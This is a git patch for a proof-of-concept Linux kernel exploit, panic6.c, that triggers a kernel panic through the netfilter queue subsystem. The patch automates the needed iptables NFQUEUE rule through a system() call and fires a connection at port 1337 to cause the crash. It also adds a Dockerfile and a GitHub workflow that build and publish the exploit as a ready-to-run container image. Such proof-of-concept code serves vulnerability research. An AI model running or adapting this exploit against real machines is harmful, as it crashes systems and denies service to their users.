From 3bd11b1f2e11f9077471fe187f275e62a348ed40 Mon Sep 17 00:00:00 2001 From: Domingo Dirutigliano Date: Thu, 7 Sep 2023 12:06:17 +0200 Subject: [PATCH] unprivilaged poc --- .github/workflows/docker-image.yml | 53 ++++++++++++++++++++++++++++++ Dockerfile | 9 +++++ panic6.c | 19 +++++++---- 3 files changed, 74 insertions(+), 7 deletions(-) create mode 100644 .github/workflows/docker-image.yml create mode 100644 Dockerfile diff --git a/.github/workflows/docker-image.yml b/.github/workflows/docker-image.yml new file mode 100644 index 0000000..9026c78 --- /dev/null +++ b/.github/workflows/docker-image.yml @@ -0,0 +1,53 @@ +name: Create and publish a Docker image + +on: + release: + types: + - published + +env: + REGISTRY: ghcr.io + IMAGE_NAME: ${{ github.repository }} + +jobs: + build-and-push-image: + runs-on: ubuntu-latest + permissions: + contents: read + packages: write + + steps: + - name: Checkout repository + uses: actions/checkout@v3 + + - name: Set up QEMU + uses: docker/setup-qemu-action@master + with: + platforms: all + + - name: Set up Docker Buildx + id: buildx + uses: docker/setup-buildx-action@master + + - name: Log in to the Container registry + uses: docker/login-action@v2 + with: + registry: ${{ env.REGISTRY }} + username: ${{ github.actor }} + password: ${{ secrets.GITHUB_TOKEN }} + + - name: Extract metadata (tags, labels) for Docker + id: meta + uses: docker/metadata-action@v4 + with: + images: ${{ env.REGISTRY }}/${{ env.IMAGE_NAME }} + + - name: Build and push Docker image + uses: docker/build-push-action@v3 + with: + context: . + builder: ${{ steps.buildx.outputs.name }} + platforms: linux/amd64,linux/arm64 + push: true + tags: ${{ steps.meta.outputs.tags }} + labels: ${{ steps.meta.outputs.labels }} \ No newline at end of file diff --git a/Dockerfile b/Dockerfile new file mode 100644 index 0000000..2ac0bf0 --- /dev/null +++ b/Dockerfile @@ -0,0 +1,9 @@ +FROM debian + +RUN apt-get update +RUN apt-get install -y libnetfilter-queue-dev libmnl-dev libnfnetlink-dev iptables gcc +WORKDIR /exploit +COPY panic6.c panic6.c + +RUN cc panic6.c -o nfpanic -lmnl -lnetfilter_queue +CMD ["./nfpanic"] \ No newline at end of file diff --git a/panic6.c b/panic6.c index 754d840..7b8cc59 100644 --- a/panic6.c +++ b/panic6.c @@ -33,6 +33,7 @@ int socket_conn(uint16_t port) // connect the client socket to server socket connect(sockfd, (struct sockaddr *)&servaddr, sizeof(servaddr)); + return sockfd; } int main(int argc, char *argv[]) @@ -71,14 +72,17 @@ int main(int argc, char *argv[]) perror( "mnl_socket_send" ); exit(EXIT_FAILURE); } - - printf("[*] You need to associate to this queue the port 1337: sudo iptables -t mangle -A PREROUTING -j NFQUEUE -p tcp --dport 1337 --queue-num %d\n", queue_num); - puts("Press ENTER to contiune (and panic)"); - getchar(); + + puts("[*] Linking the nfqueue to a real connection through iptables"); + char cmd[200]; + sprintf(cmd, "iptables -t mangle -A PREROUTING -j NFQUEUE -p tcp --dport 1337 --queue-num %d\n", queue_num); + if (system(cmd) != 0) { + perror( "system" ); + exit(EXIT_FAILURE); + } puts("[*] Sending a connection packet to nfqueue"); socket_conn(1337); - puts("[*] Waiting for a packet in the nfqueue"); if (mnl_socket_recvfrom(nl, buf, BUF_SIZE) == -1) { @@ -97,8 +101,9 @@ int main(int argc, char *argv[]) perror( "mnl_socket_send" ); exit(EXIT_FAILURE); } - puts("[*] Are you still alive?"); - + + puts("[*] Are you still alive? Probably your kernel is not vulnerable :("); + return EXIT_SUCCESS; }